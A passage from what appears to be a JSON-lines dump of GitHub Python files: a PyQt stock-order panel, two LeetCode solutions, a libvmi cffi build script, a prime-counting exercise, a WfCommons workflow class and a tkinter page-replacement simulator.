self.radio_button_sell.setFixedWidth(70)\n self.button_place_order = QPushButton(\"下 单\")\n self.button_place_order.setFont(QFont(\"SimSun\", 9))\n self.button_place_order.setStyleSheet(\"font:bold;color:red\") # 初始红色\n self.button_place_order.setFixedWidth(70)\n \n self.label_order_id = QLabel(\"撤单委托编号\")\n self.label_order_id.setFixedWidth(70)\n self.label_order_id.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.line_edit_order_id = QLineEdit(\"\")\n self.line_edit_order_id.setFixedWidth(70)\n self.line_edit_order_id.setStyleSheet(\"color:blue\")\n self.line_edit_order_id.setFont(QFont(\"SimSun\", 9))\n self.button_cancel_order = QPushButton(\"撤 单\")\n self.button_cancel_order.setFont(QFont(\"SimSun\", 9))\n self.button_cancel_order.setStyleSheet(\"font:bold;color:blue\")\n self.button_cancel_order.setFixedWidth(70)\n \n self.h_box_layout_order_buttons = QHBoxLayout()\n self.h_box_layout_order_buttons.setContentsMargins(-1, -1, -1, -1)\n self.h_box_layout_order_buttons.addStretch(1)\n self.h_box_layout_order_buttons.addWidget(self.radio_button_buy)\n self.h_box_layout_order_buttons.addStretch(1)\n self.h_box_layout_order_buttons.addWidget(self.radio_button_sell)\n self.h_box_layout_order_buttons.addStretch(1)\n self.h_box_layout_order_buttons.addWidget(self.button_place_order)\n self.h_box_layout_order_buttons.addStretch(1)\n \n self.h_box_layout_cancel_order = QHBoxLayout()\n self.h_box_layout_cancel_order.setContentsMargins(-1, -1, -1, -1) #\n self.h_box_layout_cancel_order.addStretch(1)\n self.h_box_layout_cancel_order.addWidget(self.label_order_id)\n self.h_box_layout_cancel_order.addStretch(1)\n self.h_box_layout_cancel_order.addWidget(self.line_edit_order_id)\n self.h_box_layout_cancel_order.addStretch(1)\n self.h_box_layout_cancel_order.addWidget(self.button_cancel_order)\n self.h_box_layout_cancel_order.addStretch(1)\n \n self.v_box_layout_order = QVBoxLayout()\n self.v_box_layout_order.setContentsMargins(-1, -1, -1, -1)\n self.v_box_layout_order.addLayout(self.grid_layout_essential)\n self.v_box_layout_order.addLayout(self.h_box_layout_order_buttons)\n self.v_box_layout_order.addLayout(self.h_box_layout_cancel_order)\n \n self.label_high_limit = QLabel(\"涨停\")\n self.label_ask_5 = QLabel(\"卖五\")\n self.label_ask_4 = QLabel(\"卖四\")\n self.label_ask_3 = QLabel(\"卖三\")\n self.label_ask_2 = QLabel(\"卖二\")\n self.label_ask_1 = QLabel(\"卖一\")\n self.label_last = QLabel(\"最新\")\n self.label_last.setMinimumWidth(35)\n self.label_bid_1 = QLabel(\"买一\")\n self.label_bid_2 = QLabel(\"买二\")\n self.label_bid_3 = QLabel(\"买三\")\n self.label_bid_4 = QLabel(\"买四\")\n self.label_bid_5 = QLabel(\"买五\")\n self.label_low_limit = QLabel(\"跌停\")\n \n self.label_high_limit.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_last.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_low_limit.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n \n self.label_high_limit_price = QLabel(\"0.00\")\n self.label_high_limit_price.setMinimumWidth(60)\n self.label_ask_price_5 = QLabel(\"0.00\")\n self.label_ask_price_4 = QLabel(\"0.00\")\n self.label_ask_price_3 = QLabel(\"0.00\")\n self.label_ask_price_2 = QLabel(\"0.00\")\n self.label_ask_price_1 = QLabel(\"0.00\")\n self.label_ask_volume_5 = QLabel(\"0\")\n self.label_ask_volume_4 = QLabel(\"0\")\n self.label_ask_volume_3 = QLabel(\"0\")\n self.label_ask_volume_2 = QLabel(\"0\")\n self.label_ask_volume_1 = QLabel(\"0\")\n self.label_last_price = QLabel(\"0.00\")\n self.label_last_price.setMinimumWidth(60)\n self.label_last_up_down = QLabel(\"0.00%\")\n self.label_last_up_down.setMinimumWidth(60)\n self.label_bid_price_1 = QLabel(\"0.00\")\n self.label_bid_price_2 = QLabel(\"0.00\")\n self.label_bid_price_3 = QLabel(\"0.00\")\n self.label_bid_price_4 = QLabel(\"0.00\")\n self.label_bid_price_5 = QLabel(\"0.00\")\n self.label_bid_volume_1 = QLabel(\"0\")\n self.label_bid_volume_2 = QLabel(\"0\")\n self.label_bid_volume_3 = QLabel(\"0\")\n self.label_bid_volume_4 = QLabel(\"0\")\n self.label_bid_volume_5 = QLabel(\"0\")\n self.label_low_limit_price = QLabel(\"0.00\")\n self.label_low_limit_price.setMinimumWidth(60)\n \n self.label_high_limit_price.setPalette(self.color_red)\n self.label_ask_price_5.setPalette(self.color_green)\n self.label_ask_price_4.setPalette(self.color_green)\n self.label_ask_price_3.setPalette(self.color_green)\n self.label_ask_price_2.setPalette(self.color_green)\n self.label_ask_price_1.setPalette(self.color_green)\n self.label_ask_volume_5.setPalette(self.color_green)\n self.label_ask_volume_4.setPalette(self.color_green)\n self.label_ask_volume_3.setPalette(self.color_green)\n self.label_ask_volume_2.setPalette(self.color_green)\n self.label_ask_volume_1.setPalette(self.color_green)\n self.label_last_price.setPalette(self.color_black)\n self.label_last_up_down.setPalette(self.color_black)\n self.label_bid_price_1.setPalette(self.color_red)\n self.label_bid_price_2.setPalette(self.color_red)\n self.label_bid_price_3.setPalette(self.color_red)\n self.label_bid_price_4.setPalette(self.color_red)\n self.label_bid_price_5.setPalette(self.color_red)\n self.label_bid_volume_1.setPalette(self.color_red)\n self.label_bid_volume_2.setPalette(self.color_red)\n self.label_bid_volume_3.setPalette(self.color_red)\n self.label_bid_volume_4.setPalette(self.color_red)\n self.label_bid_volume_5.setPalette(self.color_red)\n self.label_low_limit_price.setPalette(self.color_green)\n \n self.label_high_limit_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_last_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_last_up_down.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_low_limit_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n \n self.grid_layout_quote = QGridLayout()\n self.grid_layout_quote.addWidget(self.label_high_limit, 0, 0) #\n self.grid_layout_quote.addWidget(self.label_ask_5, 1, 0)\n self.grid_layout_quote.addWidget(self.label_ask_4, 2, 0)\n self.grid_layout_quote.addWidget(self.label_ask_3, 3, 0)\n self.grid_layout_quote.addWidget(self.label_ask_2, 4, 0)\n self.grid_layout_quote.addWidget(self.label_ask_1, 5, 0)\n self.grid_layout_quote.addWidget(self.label_last, 6, 0) #\n self.grid_layout_quote.addWidget(self.label_bid_1, 7, 0)\n self.grid_layout_quote.addWidget(self.label_bid_2, 8, 0)\n self.grid_layout_quote.addWidget(self.label_bid_3, 9, 0)\n self.grid_layout_quote.addWidget(self.label_bid_4, 10, 0)\n self.grid_layout_quote.addWidget(self.label_bid_5, 11, 0)\n self.grid_layout_quote.addWidget(self.label_low_limit, 12, 0) #\n self.grid_layout_quote.addWidget(self.label_high_limit_price, 0, 1) #\n self.grid_layout_quote.addWidget(self.label_ask_price_5, 1, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_4, 2, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_3, 3, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_2, 4, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_1, 5, 1)\n self.grid_layout_quote.addWidget(self.label_last_price, 6, 1) #\n self.grid_layout_quote.addWidget(self.label_bid_price_1, 7, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_2, 8, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_3, 9, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_4, 10, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_5, 11, 1)\n self.grid_layout_quote.addWidget(self.label_low_limit_price, 12, 1) #\n self.grid_layout_quote.addWidget(self.label_ask_volume_5, 1, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_4, 2, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_3, 3, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_2, 4, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_1, 5, 2)\n self.grid_layout_quote.addWidget(self.label_last_up_down, 6, 2) #\n self.grid_layout_quote.addWidget(self.label_bid_volume_1, 7, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_2, 8, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_3, 9, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_4, 10, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_5, 11, 2)\n \n self.main_text_edit_bottom = QTextEdit(self)\n self.main_text_edit_bottom.setText(\"\")\n self.main_text_edit_bottom.setFont(QFont(\"SimSun\", 9))\n \n self.h_box_layout_1 = QHBoxLayout()\n self.h_box_layout_1.addLayout(self.v_box_layout_order)\n self.h_box_layout_1.addLayout(self.grid_layout_quote)\n \n self.h_box_layout_2 = QHBoxLayout()\n self.h_box_layout_2.setContentsMargins(-1, -1, -1, -1)\n self.h_box_layout_2.addWidget(self.main_text_edit_bottom)\n \n self.v_box_layout_mian = QVBoxLayout()\n self.v_box_layout_mian.setContentsMargins(-1, -1, -1, -1)\n self.v_box_layout_mian.addLayout(self.h_box_layout_1)\n self.v_box_layout_mian.addLayout(self.h_box_layout_2)\n \n self.setLayout(self.v_box_layout_mian)\n \n self.combo_exchange.activated[str].connect(self.OnChangeExchange)\n self.line_edit_symbol.editingFinished.connect(self.OnChangeSymbol)\n self.radio_button_buy.clicked.connect(self.OnChangeBuySell)\n self.radio_button_sell.clicked.connect(self.OnChangeBuySell)\n self.button_place_order.clicked.connect(self.OnButtonPlaceOrder)\n self.button_cancel_order.clicked.connect(self.OnButtonCancelOrder)\n\n def OnChangeExchange(self, str_exchange):\n self.symbol = \"\"\n self.exchange = \"\"\n self.line_edit_symbol.setText(\"\")\n self.line_edit_name.setText(\"\")\n self.OnChangeSymbol()\n\n def OnChangeSymbol(self):\n self.exchange = \"\"\n self.symbol = self.line_edit_symbol.text() #str(unicode(self.line_edit_symbol.text(), \"gb2312\"))\n \n self.spin_price.setValue(0)\n self.spin_volume.setValue(0)\n \n self.label_high_limit_price.setText(\"0.00\")\n self.label_ask_price_5.setText(\"0.00\")\n self.label_ask_price_4.setText(\"0.00\")\n self.label_ask_price_3.setText(\"0.00\")\n self.label_ask_price_2.setText(\"0.00\")\n self.label_ask_price_1.setText(\"0.00\")\n self.label_ask_volume_5.setText(\"0\")\n self.label_ask_volume_4.setText(\"0\")\n self.label_ask_volume_3.setText(\"0\")\n self.label_ask_volume_2.setText(\"0\")\n self.label_ask_volume_1.setText(\"0\")\n self.label_last_price.setText(\"0.00\")\n self.label_last_up_down.setText(\"0.00%\")\n self.label_bid_price_1.setText(\"0.00\")\n self.label_bid_price_2.setText(\"0.00\")\n self.label_bid_price_3.setText(\"0.00\")\n self.label_bid_price_4.setText(\"0.00\")\n self.label_bid_price_5.setText(\"0.00\")\n self.label_bid_volume_1.setText(\"0\")\n self.label_bid_volume_2.setText(\"0\")\n self.label_bid_volume_3.setText(\"0\")\n self.label_bid_volume_4.setText(\"0\")\n self.label_bid_volume_5.setText(\"0\")\n self.label_low_limit_price.setText(\"0.00\")\n\n def OnChangeBuySell(self):\n if self.radio_button_buy.isChecked():\n self.line_edit_symbol.setStyleSheet(\"color:red\")\n self.line_edit_name.setStyleSheet(\"background-color:rgb(240,240,240);color:red\")\n self.spin_price.setStyleSheet(\"color:red\")\n self.spin_volume.setStyleSheet(\"color:red\")\n self.button_place_order.setStyleSheet(\"font:bold;color:red\")\n if self.radio_button_sell.isChecked():\n self.line_edit_symbol.setStyleSheet(\"color:green\")\n self.line_edit_name.setStyleSheet(\"background-color:rgb(240,240,240);color:green\")\n self.spin_price.setStyleSheet(\"color:green\")\n self.spin_volume.setStyleSheet(\"color:green\")\n self.button_place_order.setStyleSheet(\"font:bold;color:green\")\n\n def OnUpdateQuote(self, data, price_round):\n try:\n self.exchange = data[3].decode() # 证券市场\n self.line_edit_name.setText(str(data[1].decode(\"gbk\"))) # 证券名称 #QString.fromLocal8Bit(data[1].decode(\"gbk\")) # 含中文\n self.label_ask_price_5.setText(str(round(data[13][4], price_round)))\n self.label_ask_price_4.setText(str(round(data[13][3], price_round)))\n self.label_ask_price_3.setText(str(round(data[13][2], price_round)))\n self.label_ask_price_2.setText(str(round(data[13][1], price_round)))\n self.label_ask_price_1.setText(str(round(data[13][0], price_round)))\n self.label_ask_volume_5.setText(str(data[14][4]))\n self.label_ask_volume_4.setText(str(data[14][3]))\n self.label_ask_volume_3.setText(str(data[14][2]))\n self.label_ask_volume_2.setText(str(data[14][1]))\n self.label_ask_volume_1.setText(str(data[14][0]))\n self.label_bid_price_1.setText(str(round(data[15][0], price_round)))\n self.label_bid_price_2.setText(str(round(data[15][1], price_round)))\n self.label_bid_price_3.setText(str(round(data[15][2], price_round)))\n self.label_bid_price_4.setText(str(round(data[15][3], price_round)))\n self.label_bid_price_5.setText(str(round(data[15][4], price_round)))\n self.label_bid_volume_1.setText(str(data[16][0]))\n self.label_bid_volume_2.setText(str(data[16][1]))\n self.label_bid_volume_3.setText(str(data[16][2]))\n self.label_bid_volume_4.setText(str(data[16][3]))\n self.label_bid_volume_5.setText(str(data[16][4]))\n self.label_high_limit_price.setText(str(round(data[17], price_round))) # 涨停价\n self.label_low_limit_price.setText(str(round(data[18], price_round))) # 跌停价\n self.label_last_price.setText(str(round(data[5], price_round))) # 最新价\n if data[10] > 0.0: # 昨收价\n f_last_up_down = (data[5] / data[10]) - 1.0\n self.label_last_up_down.setText((\"%.2f%%\" % (f_last_up_down * 100.0)))\n if f_last_up_down > 0.0:\n self.label_last_up_down.setPalette(self.color_red)\n elif f_last_up_down < 0.0:\n self.label_last_up_down.setPalette(self.color_green)\n else:\n self.label_last_up_down.setPalette(self.color_black)\n else:\n self.label_last_up_down.setText(\"0.00%\")\n except Exception as e:\n self.log_text = \"%s:函数 OnUpdateQuote 异常!%s\" % (self.strategy, e)\n self.logger.SendMessage(\"E\", 4, self.log_cate, self.log_text, \"M\")\n\n def OnButtonPlaceOrder(self):\n if self.trader != None:\n if self.trader.IsTraderReady() == False:\n self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未开启!\", \"M\")\n else:\n if self.line_edit_symbol.text() == \"\":\n QMessageBox.warning(self, \"提示\", \"证券代码为空!\", QMessageBox.Ok)\n return\n str_symbol = self.line_edit_symbol.text() #str(unicode(self.line_edit_symbol.text(), \"gb2312\"))\n str_exchange = \"\"\n if self.combo_exchange.currentText() == define.DEF_EXCHANGE_STOCK_SH:\n str_exchange = \"SH\"\n elif self.combo_exchange.currentText() == define.DEF_EXCHANGE_STOCK_SZ:\n str_exchange = \"SZ\"\n f_price = self.spin_price.value()\n n_amount = self.spin_volume.value()\n n_entr_type = 0\n if self.combo_entr_type.currentText() == define.DEF_PRICE_TYPE_STOCK_LIMIT:\n n_entr_type = 1\n elif self.combo_entr_type.currentText() == define.DEF_PRICE_TYPE_STOCK_MARKET:\n n_entr_type = 2\n n_exch_side = 0\n if self.radio_button_buy.isChecked():\n n_exch_side = 1\n elif self.radio_button_sell.isChecked():\n n_exch_side = 2\n order = self.trader.Order(symbol = str_symbol, exchange = str_exchange, price = f_price, amount = n_amount, entr_type = n_entr_type, exch_side = n_exch_side)\n task_place = self.trader.PlaceOrder(order, self.strategy)\n QMessageBox.information(self, \"提示\", \"委托下单提交完成。\", QMessageBox.Ok)\n else:\n self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未获取!\", \"M\")\n\n def OnButtonCancelOrder(self):\n if self.trader != None:\n if self.trader.IsTraderReady() == False:\n self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未开启!\", \"M\")\n else:\n if self.line_edit_order_id.text() == \"\":\n QMessageBox.warning(self, \"提示\", \"撤单委托编号为空!\", QMessageBox.Ok)\n return\n order = self.trader.Order()\n order.order_id = int(self.line_edit_order_id.text()) # int\n task_cancel = self.trader.CancelOrder(order, self.strategy)\n QMessageBox.information(self, \"提示\", \"委托撤单提交完成。\", QMessageBox.Ok)\n else:\n self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未获取!\", \"M\")\n\n####################################################################################################\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n panel = Panel(\"Strategy_Trader_STK_APE\")\n panel.show()\n sys.exit(app.exec_())\n","repo_name":"2bds/quantx","sub_path":"src/main/face/panel_trader_stk_ape.py","file_name":"panel_trader_stk_ape.py","file_ext":"py","file_size_in_byte":30485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73725454954","text":"class Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n # resultMap={}\n # for index,i in enumerate(numbers):\n # if i in resultMap.keys():\n # return [resultMap[i],index+1]\n # else:\n # resultMap[target-i]=index+1\n left,right=0,len(numbers)-1\n while lefttarget:\n right-=1\n elif newSum',\n '#include ',\n '#define LIBVMI_EXTRA_GLIB',\n '#include ',\n '#include '\n]\n\n\ndef get_cflags(package):\n includes = pkgconfig.cflags(package)\n if not includes:\n raise RuntimeError('Unable to find pkgconfig cflags'\n ' for {}'.format(package))\n includes = includes.replace('-I', '').split(' ')\n return includes\n\n\ndef get_libs(package):\n libs = pkgconfig.libs(package)\n if not libs:\n raise RuntimeError('Unable to find pkgconfig libs'\n ' for {}'.format(package))\n libs = libs.replace('-l', '').split(' ')\n return libs\n\n\ndef check_header(header):\n inc_path_list = [\n '/usr/include',\n '/usr/local/include'\n ]\n for inc_path in inc_path_list:\n if os.path.exists(inc_path + '/' + header):\n return True\n return False\n\n\n# glib cflags and libs\nglib_includes = get_cflags('glib-2.0')\nglib_libs = get_libs('glib-2.0')\n\n# get libvmi libs\nlibvmi_libs = get_libs('libvmi')\n\nincludes = []\nincludes.extend(glib_includes)\n\nlibs = []\nlibs.extend(libvmi_libs)\nlibs.extend(glib_libs)\n\nffi = FFI()\n\n# checking for events.h\nif check_header('libvmi/events.h'):\n VMI_SOURCES.append('#include ')\n CDEF_HEADERS.append('events_cdef.h')\n\nc_header_source = '\\n'.join(VMI_SOURCES)\n\n# set source\nffi.set_source(\"_libvmi\", c_header_source,\n libraries=libs, include_dirs=includes)\n\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n# we read our C definitions from an external file\n# easier to maintain + C syntax highlighting\ncdef_content = \"\"\nfor cdef_path in CDEF_HEADERS:\n with open(os.path.join(script_dir, cdef_path)) as cdef_file:\n cdef_content += cdef_file.read()\n # add newline for next file\n cdef_content += '\\n'\nffi.cdef(cdef_content)\n\n\nif __name__ == \"__main__\":\n ffi.compile(verbose=True)\n","repo_name":"libvmi/python","sub_path":"libvmi/libvmi_build.py","file_name":"libvmi_build.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"9266696832","text":"# baekjoon 1978 : 소수 찾기\n# solved by JY\n# DATE : 2022.02.09\n# 에라토스테네스의 체\n# 구현\n\nfrom sys import stdin\ninput = stdin.readline\n\nn = int(input())\nans = 0\n\ndef check(num):\n i = 2\n while i*i <= num:\n if num % i == 0: return False\n i += 1\n return True\n\nfor num in list(map(int, input().split())):\n if num != 1 and check(num):\n ans += 1\n\nprint(ans)","repo_name":"Jiyooung/ALGORITHM","sub_path":"baekjoon/2022년/2022-02/JY_B1978_re.py","file_name":"JY_B1978_re.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29576269455","text":"import getpass\nimport json\nimport networkx as nx\nimport pathlib\n\nfrom datetime import datetime\nfrom typing import Optional, List\nfrom ..common.task import Task\nfrom ..version import __version__\n\nfrom ..wfchef.utils import create_graph\nimport tempfile\n\n\nclass Workflow(nx.DiGraph):\n \"\"\"\n Representation of a workflow. The workflow representation is an extension of the\n `NetworkX DiGraph class `_.\n\n :param name: Workflow name.\n :type name: str\n :param description: Workflow instance description.\n :type description: Optional[str]\n :param wms_name: WMS name.\n :type wms_name: Optional[str]\n :param wms_version: WMS version.\n :type wms_version: Optional[str]\n :param wms_url: URL for the WMS website.\n :type wms_url: Optional[str]\n :param executed_at: Workflow start timestamp in the ISO 8601 format.\n :type executed_at: Optional[str]\n :param makespan: Workflow makespan in seconds.\n :type makespan: Optional[int]\n \"\"\"\n\n def __init__(self,\n name: Optional[str] = \"workflow\",\n description: Optional[str] = None,\n wms_name: Optional[str] = None,\n wms_version: Optional[str] = None,\n wms_url: Optional[str] = None,\n executed_at: Optional[str] = None,\n makespan: Optional[int] = 0.0\n ) -> None:\n \"\"\"Create an object of a workflow representation.\"\"\"\n self.description: Optional[\n str] = description if description else \"Instance generated with WfCommons - https://wfcommons.org\"\n self.created_at: str = str(datetime.now().astimezone().isoformat())\n self.schema_version: str = \"1.4\"\n self.wms_name: Optional[str] = \"WfCommons\" if not wms_name else wms_name\n self.wms_version: Optional[str] = str(__version__) if not wms_version else wms_version\n self.wms_url: Optional[str] = f\"https://docs.wfcommons.org/en/v{__version__}/\" if not wms_url else wms_url\n self.executed_at: Optional[str] = datetime.now().astimezone().isoformat() if not executed_at else executed_at\n self.makespan: Optional[int] = makespan\n self.tasks = {}\n self.tasks_parents = {}\n self.tasks_children = {}\n super().__init__(name=name, makespan=self.makespan, executedat=self.executed_at)\n\n def add_task(self, task: Task) -> None:\n \"\"\"\n Add a Task to the workflow.\n\n :param task: A Task object.\n :type task: Task\n \"\"\"\n self.tasks[task.name] = task\n self.tasks_parents.setdefault(task.name, set())\n self.tasks_children.setdefault(task.name, set())\n self.add_node(task.name, task=task)\n\n def add_dependency(self, parent: str, child: str) -> None:\n \"\"\"\n Add a dependency between tasks.\n\n :param parent: Parent task name.\n :type parent: str\n :param child: Child task name.\n :type child: str\n \"\"\"\n self.tasks_parents[child].add(parent)\n self.tasks_children[parent].add(child)\n self.add_edge(parent, child, weight=0)\n\n def write_json(self, json_file_path: Optional[pathlib.Path] = None) -> None:\n \"\"\"\n Write a JSON file of the workflow instance.\n\n :param json_file_path: JSON output file name.\n :type json_file_path: Optional[pathlib.Path]\n \"\"\"\n workflow_machines = []\n machines_list = []\n workflow_tasks = []\n\n workflow_json = {\n \"name\": self.name,\n \"description\": self.description,\n \"createdAt\": self.created_at,\n \"schemaVersion\": self.schema_version,\n \"author\": {\n \"name\": str(getpass.getuser()),\n \"email\": \"support@wfcommons.org\"\n },\n \"wms\": {\n \"name\": self.wms_name,\n \"version\": self.wms_version,\n \"url\": self.wms_url\n },\n \"workflow\": {\n \"executedAt\": self.executed_at,\n \"makespanInSeconds\": self.makespan,\n \"tasks\": workflow_tasks\n }\n }\n\n # generate tasks parents and children\n tasks_dependencies = {}\n for edge in self.edges:\n for task_name in edge:\n if task_name not in tasks_dependencies:\n tasks_dependencies[task_name] = {\"parents\": [], \"children\": []}\n tasks_dependencies[edge[0]][\"children\"].append(edge[1])\n tasks_dependencies[edge[1]][\"parents\"].append(edge[0])\n\n # add tasks to the workflow json object\n for node in self.nodes:\n task: Task = self.nodes[node][\"task\"]\n task_obj = task.as_dict()\n\n # manage task dependencies\n if task.name in tasks_dependencies:\n task_obj[\"parents\"] = tasks_dependencies[task.name][\"parents\"]\n task_obj[\"children\"] = tasks_dependencies[task.name][\"children\"]\n\n workflow_tasks.append(task_obj)\n\n # add machines to the workflow json object\n if task.machine and task.machine.name not in machines_list:\n machines_list.append(task.machine.name)\n workflow_machines.append(task.machine.as_dict())\n\n if workflow_machines:\n workflow_json[\"workflow\"][\"machines\"] = workflow_machines\n\n # write to file\n if not json_file_path:\n json_file_path = pathlib.Path(f\"{self.name.lower()}.json\")\n with open(json_file_path, \"w\") as outfile:\n outfile.write(json.dumps(workflow_json, indent=4))\n \n self.workflow_json = workflow_json\n\n def write_dot(self, dot_file_path: Optional[pathlib.Path] = None) -> None:\n \"\"\"\n Write a dot file of the workflow instance.\n\n :param dot_file_path: DOT output file name.\n :type dot_file_path: Optional[pathlib.Path]\n \"\"\"\n if not dot_file_path:\n dot_file_path = pathlib.Path(f\"{self.name.lower()}.dot\")\n nx.nx_agraph.write_dot(self, dot_file_path)\n\n def to_nx_digraph(self) -> nx.DiGraph:\n with tempfile.NamedTemporaryFile() as temp:\n self.write_json(pathlib.Path(temp.name))\n return create_graph(pathlib.Path(temp.name))\n\n def roots(self) -> List[Task]:\n return [n for n,d in self.in_degree() if d==0]\n\n def leaves(self) -> List[Task]:\n return [n for n,d in self.out_degree() if d==0]\n","repo_name":"wfcommons/wfcommons","sub_path":"wfcommons/common/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"3348508622","text":"class Solution:\n def buildArray(self, target: List[int], n: int) -> List[str]:\n res = []\n build_arr = []\n for i in range(n):\n if build_arr == target:\n break\n if i+1 in target:\n res.append(\"Push\")\n build_arr.append(i+1)\n else:\n res.append(\"Push\")\n res.append(\"Pop\")\n\n return res\n","repo_name":"sasankyadavalli/leetcode","sub_path":"buildArray_1441.py","file_name":"buildArray_1441.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27005363739","text":"from tkinter import *\nfrom tkinter.ttk import Combobox\nfrom queue import Queue\nfrom tkinter import messagebox as mbox\nimport xlwt \nfrom xlwt import Workbook \nfrom paging_algo import lru,opr,fifo\nimport csv\nimport os\n\nex_qu=[]\nex_size=[]\nex_page_faults=[]\nex_ans=[]\nex_str=[]\nex_algo=[]\nex_que_size=[]\n\ndef on_closing():\n if mbox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n with open('Paging.csv','a+',newline='') as file:\n writer = csv.writer(file,delimiter = ',')\n main_list = []\n for i in range(len(ex_algo)):\n list = []\n list.append(ex_algo[i])\n list.append(ex_size[i])\n list.append(ex_que_size[i])\n list.append(str(ex_qu[i]))\n list.append(ex_page_faults[i])\n list.append(ex_ans[i])\n list.append(ex_str[i])\n main_list.append(list)\n writer.writerows(main_list)\n paging.destroy()\n\n\ndef get_values():\n mem_size = \"\"\n algo_no = \"\"\n str2 = \"\"\n temp_str=\"\"\n process_string = \"\"\n final = \"\"\n mem_size = var1.get()\n algo_no = var2.get()\n process_string = var3.get()\n temp_str=process_string\n if process_string == \"\":\n mbox.showerror('Error', 'Please Enter Required Information!!')\n elif process_string.isdigit():\n if mem_size == \"\" or algo_no == \"\":\n mbox.showerror('Error', 'Please Enter Required Information!!')\n else:\n process_string = list(process_string)\n for i in range(0, len(process_string)):\n process_string[i] = int(process_string[i])\n if algo_no == \"fifo\":\n ans, str2 = fifo(process_string, len(process_string), int(mem_size))\n elif algo_no == \"lru\":\n ans, str2 = lru(process_string, len(process_string), int(mem_size))\n elif algo_no == \"opr\":\n ans, str2 = opr(process_string, len(process_string), int(mem_size))\n ex_final=str2\n temp = min(125, len(str2))\n for i in range(0, temp):\n final += str2[i]\n ans1 = len(process_string) - ans\n lbl1.configure(text=ans)\n lbl2.configure(text=ans1)\n lbl3.configure(text=final)\n if len(ex_size)!=0 and mem_size==ex_size[-1] and temp_str==ex_qu[-1] and 